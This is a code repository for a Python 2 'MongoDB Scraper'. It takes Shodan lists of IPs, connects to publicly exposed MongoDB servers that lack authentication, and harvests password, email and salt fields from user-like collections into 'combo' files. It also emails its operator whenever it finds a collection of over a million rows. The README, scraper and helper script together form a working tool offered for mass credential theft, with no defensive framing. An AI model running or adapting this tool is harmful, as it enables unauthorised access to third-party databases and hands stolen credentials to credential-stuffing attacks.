├── .gitignore
├── README.md
├── mongodb-scraper.py
├── parse_data.py
└── settings-dist.json

/.gitignore:
--------------------------------------------------------------------------------
.idea
data
data_orig.json
ip.py
mongodb-scraper.log*
data.json
data_raw.json
processed.json
passwords*.txt
combo*.txt
settings.json
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# MongoDB Scraper

According to Shodan, there are more than 30k MongoDB instances publicly available, running on the standard port. Many of them are running with the default settings (i.e. no authentication required).

What if we start scraping them all and dump the passwords?

### Requirements
```
pip install pymongo
pip install colorlog
```
The scraper is written for Python 2 (it relies on `basestring`, `iteritems` and `unicode`).

### Usage
First of all, create a `data.json` file containing a JSON encoded array of IPs:
```
["123.45.67.89", "98.76.54.32"]
```
If you have downloaded a report from Shodan, you can easily parse it with the bundled `parse_data.py` script: it reads the export from `data_raw.json` and writes `data.json` for you.
Then simply run the scraper with the following command:
```
python mongodb-scraper.py
```

You can supply a comma separated list of IPs via the additional `--skip` argument to manually mark some IPs as processed and thus exclude them from the stack:
```
python mongodb-scraper.py --skip "123.123.123.123,123.45.67.89"
```

### Get alerts on juicy results
If you want to get an email when the scraper finds some BIG DUMP (by default, a collection with more than 1M rows), simply copy the `settings-dist.json` file, rename it to `settings.json` and fill in all the fields.
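For reference, here is what a filled-in `settings.json` could look like (every value below is just a placeholder, swap in your own addresses and SMTP details):
```
{
    "email" : {
        "threshold" : 1000000,
        "from" : "scraper@example.com",
        "to" : "me@example.com",
        "smtp" : {
            "host" : "smtp.example.com",
            "port" : "587",
            "user" : "scraper@example.com",
            "password" : "secret"
        }
    }
}
```
The scraper calls `starttls()` before logging in, so the SMTP server you point it at should support STARTTLS (port 587 usually does).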
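### Shodan export format
`parse_data.py` expects the Shodan export to be saved as `data_raw.json`, with one JSON document per line; only the `ip_str` field of each record is used. A single line could look roughly like this (hypothetical, trimmed record):
```
{"ip_str": "123.45.67.89", "port": 27017, "data": "..."}
```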

--------------------------------------------------------------------------------
/mongodb-scraper.py:
--------------------------------------------------------------------------------
# coding=utf-8
import argparse
import logging
import logging.handlers
import json
import re
from colorlog import ColoredFormatter
from pymongo import MongoClient
from pymongo import errors as mongo_errors
import io
import os
import smtplib
from email.mime.text import MIMEText


class MongodbScraper:
    def __init__(self):
        # Init class variables
        self.settings = {}
        self.ips = []
        self.processed = []
        self.table_names = ['account', 'user', 'subscriber', 'customer']
        self.column_names = ['pass', 'pwd']
        self.email_regex = re.compile(r'[a-z0-9\-\._]+@[a-z0-9\-\.]+\.[a-z]{2,4}')
        self.filename = 'combo.txt'

        # Init the logger
        self.logger = logging.getLogger('mongodb-scraper')
        self.logger.setLevel(logging.DEBUG)

        # Create a rotating log handler, so we won't end up with an endless file
        rotate = logging.handlers.RotatingFileHandler(
            'mongodb-scraper.log', maxBytes=(5 * 1024 * 1024), backupCount=3)
        rotate.setLevel(logging.DEBUG)
        formatter = logging.Formatter('%(asctime)s|%(levelname)-8s| %(message)s')
        rotate.setFormatter(formatter)

        self.logger.addHandler(rotate)

        console = logging.StreamHandler()
        console.setLevel(logging.INFO)

        formatter = ColoredFormatter("%(log_color)s%(asctime)s|[%(levelname)-4s] %(message)s%(reset)s", "%H:%M:%S")
        console.setFormatter(formatter)
        self.logger.addHandler(console)

        # Check that the data dir exists
        if not os.path.exists('data'):
            os.makedirs('data')

        # Load previous data
        self._load_data()

        # Let's parse some CLI options
        parser = argparse.ArgumentParser()
        parser.add_argument('-s', '--skip', help='Supply a comma separated string of IPs that should be skipped')

        arguments = parser.parse_args()

        if arguments.skip:
            skip = arguments.skip.split(',')
            self.processed += skip

        # Load settings
        self._load_settings()

    def _load_data(self):
        self.logger.info("Opening data")

        try:
            with open('data.json', 'r') as data_json:
                self.ips = json.load(data_json)
        except (IOError, ValueError):
            raise RuntimeError("Please provide a valid JSON encoded file in data.json")

        self.logger.info("Found " + str(len(self.ips)) + " IPs to connect to")

        try:
            with open('processed.json', 'r') as processed_json:
                self.processed = json.load(processed_json)
        except (IOError, ValueError):
            # Meh, I'll live with that...
            pass

        if self.processed:
            self.logger.info("Found " + str(len(self.processed)) + " already processed IPs")

    def _load_settings(self):
        try:
            with open('settings.json', 'r') as settings_json:
                self.settings = json.load(settings_json)

            self.logger.info("Settings file found")
        except (IOError, ValueError):
            self.logger.info("Settings file not found")

    def _notify(self, ip, collection, count):
        try:
            threshold = self.settings['email']['threshold']
        except KeyError:
            # No threshold set, notifications are disabled
            return

        # Result is not interesting enough
        if count < threshold:
            return

        # Do I have all the required strings?
        try:
            email_from = self.settings['email']['from']
            email_to = self.settings['email']['to']
            host = self.settings['email']['smtp']['host']
            port = self.settings['email']['smtp']['port']
            user = self.settings['email']['smtp']['user']
            password = self.settings['email']['smtp']['password']
        except KeyError:
            return

        # Ok, but are they really set?
        if not all([email_from, email_to, host, port, user, password]):
            return

        # Ok, we're good to go
        body = """
        Hi Dude!
        I have just found a juicy collection!

        IP: {0}
        Collection: {1}
        Rows: {2}
        """
        body = body.format(ip, collection, count)
        mailer = smtplib.SMTP(host, str(port), timeout=10)
        mailer.starttls()
        mailer.login(user=user, password=password)
        message = MIMEText(body)

        message['Subject'] = 'Juicy collection at ' + ip
        message['From'] = email_from
        message['To'] = email_to

        try:
            mailer.sendmail(email_from, [email_to], message.as_string())
            mailer.quit()
        except smtplib.SMTPException:
            return

    def _check_datafile(self):
        size = 0

        if os.path.exists('data/' + self.filename):
            size = os.path.getsize('data/' + self.filename)

        # Did the file grow too large? Roll over to a new combo file
        if size > (20 * 1024 * 1024):
            i = 0
            while i < 100:
                i += 1

                combo_file = 'combo_' + str(i) + '.txt'
                if not os.path.exists('data/' + combo_file):
                    self.filename = combo_file
                    break

    def scrape(self):
        for ip in self.ips:
            # Have I already processed this IP?
            if ip in self.processed:
                continue

            self.logger.info("Connecting to " + ip)

            try:
                client = MongoClient(ip, connectTimeoutMS=5000)
                dbs = client.database_names()
            except (KeyboardInterrupt, SystemExit):
                return
            except:
                self.logger.warning("An error occurred while connecting to " + ip + ". Skipping")
                # Don't cry if we can't connect to the server
                self.processed.append(ip)
                continue

            for db in dbs:
                # Skip local system databases
                if db in ['admin', 'local']:
                    continue

                self.logger.debug("\t\tAnalyzing db: " + db)

                o_db = client[db]

                try:
                    collections = o_db.collection_names()
                except (KeyboardInterrupt, SystemExit):
                    return
                except Exception:
                    # Don't cry if something bad happens
                    self.logger.warning("\tAn error occurred while fetching collections from " + ip + ". Skipping.")
                    break

                for collection in collections:
                    if collection in ['system.indexes']:
                        continue

                    self.logger.debug("\t\tAnalyzing collection: " + collection)
                    # Is this a collection I'm interested in?
                    if not any(table in collection for table in self.table_names):
                        continue

                    o_coll = o_db[collection]

                    try:
                        row = o_coll.find_one()
                    except:
                        # Sometimes the collection is broken, let's skip it
                        continue

                    interesting = False

                    # If the collection is empty I get a null row
                    if row:
                        for key, value in row.iteritems():
                            # Is that a column we're interested in?
                            if any(column in key for column in self.column_names):
                                # Only consider plain strings, nothing fancy
                                if isinstance(value, basestring):
                                    interesting = True
                                    break

                    # This collection has no interesting data? Let's skip it
                    if not interesting:
                        continue

                    self.logger.info("** Table with interesting data found")

                    # Check if the current data file is too large
                    self._check_datafile()

                    # Ok, there is interesting data inside it. Let's find out if there is an email address, too.
                    # I'll just check the first record and hope there is something similar to an email address.
                    email_field = ''
                    salt_field = ''

                    for key, value in row.iteritems():
                        # If we find anything that resembles an email address, let's store it
                        if isinstance(value, basestring):
                            try:
                                if re.match(self.email_regex, value.encode('utf-8')):
                                    email_field = key

                                if 'salt' in key.lower():
                                    salt_field = key
                            except UnicodeDecodeError:
                                pass

                    rows = o_coll.find(batch_size=500).max_time_ms(10000)
                    total = rows.count()

                    if total > 750:
                        self.logger.info("***FOUND COLLECTION WITH " + '{:,}'.format(total) + " RECORDS. JUICY!!")

                    self._notify(ip, collection, total)

                    lines = []
                    counter = 0

                    try:
                        for row in rows:
                            counter += 1
                            try:
                                email = row[email_field].encode('utf-8')
                                if not email:
                                    email = ''
                            except:
                                email = ''

                            # Try to fetch the salt, if any
                            try:
                                salt = row[salt_field].encode('utf-8')
                                if not salt:
                                    salt = ''
                            except:
                                salt = ''

                            for key, value in row.iteritems():
                                try:
                                    # Skip fields marked as emails / salt
                                    if key in [email_field, salt_field]:
                                        continue

                                    # Is that a column we're interested in?
                                    if any(column in key for column in self.column_names):
                                        # Skip empty values
                                        if not value:
                                            continue

                                        # Skip fields that are not strings (i.e. reset_pass_date => datetime object)
                                        if not isinstance(value, basestring):
                                            continue

                                        value = value.encode('utf-8') + ':' + salt

                                        lines.append(unicode(ip.encode('utf-8') + '|' + email + ':' + value + '\n'))
                                except UnicodeDecodeError:
                                    # You know what? I'm done dealing with all those crazy encodings
                                    self.logger.warning("An error occurred while encoding the string. Skipping")
                                    continue

                            # If I get a very long list, let's write it in batches
                            if len(lines) >= 1000:
                                self.logger.info("\t\tWriting " + '{:,}'.format(counter) + "/" + '{:,}'.format(total) + " records")
                                with io.open('data/' + self.filename, 'a', encoding='utf-8') as fp_pass:
                                    fp_pass.writelines(lines)
                                lines = []
                    except mongo_errors.ExecutionTimeout:
                        self.logger.warning("Cursor timed out, skipping")
                    except mongo_errors.BSONError:
                        self.logger.warning("Error while fetching cursor data, skipping")
                    except KeyError:
                        self.logger.warning("Manually skipping recordset")
                    except:
                        self.logger.warning("A generic error occurred while iterating over the cursor. Skipping")

                    # Flush whatever is left in the buffer
                    with io.open('data/' + self.filename, 'a', encoding='utf-8') as fp_pass:
                        fp_pass.writelines(lines)

            client.close()
            self.processed.append(ip)

            with open('processed.json', 'w') as processed_json:
                json.dump(self.processed, processed_json)


if __name__ == '__main__':
    scraper = MongodbScraper()
    scraper.scrape()

--------------------------------------------------------------------------------
/parse_data.py:
--------------------------------------------------------------------------------
import json

ret = []

# The Shodan export (data_raw.json) contains one JSON document per line;
# we only need the "ip_str" field of each record
with open('data_raw.json', 'r') as f:
    for line in f:
        parser = json.loads(line)
        ret.append(parser.get('ip_str'))

# Dump the list of IPs in the format expected by mongodb-scraper.py
with open('data.json', 'w') as f:
    json.dump(ret, f)

--------------------------------------------------------------------------------
/settings-dist.json:
--------------------------------------------------------------------------------
{
    "email" : {
        "threshold" : 1000000,
        "from" : "",
        "to" : "",
        "smtp" : {
            "host" : "",
            "port" : "",
            "user" : "",
            "password" : ""
        }
    }
}
--------------------------------------------------------------------------------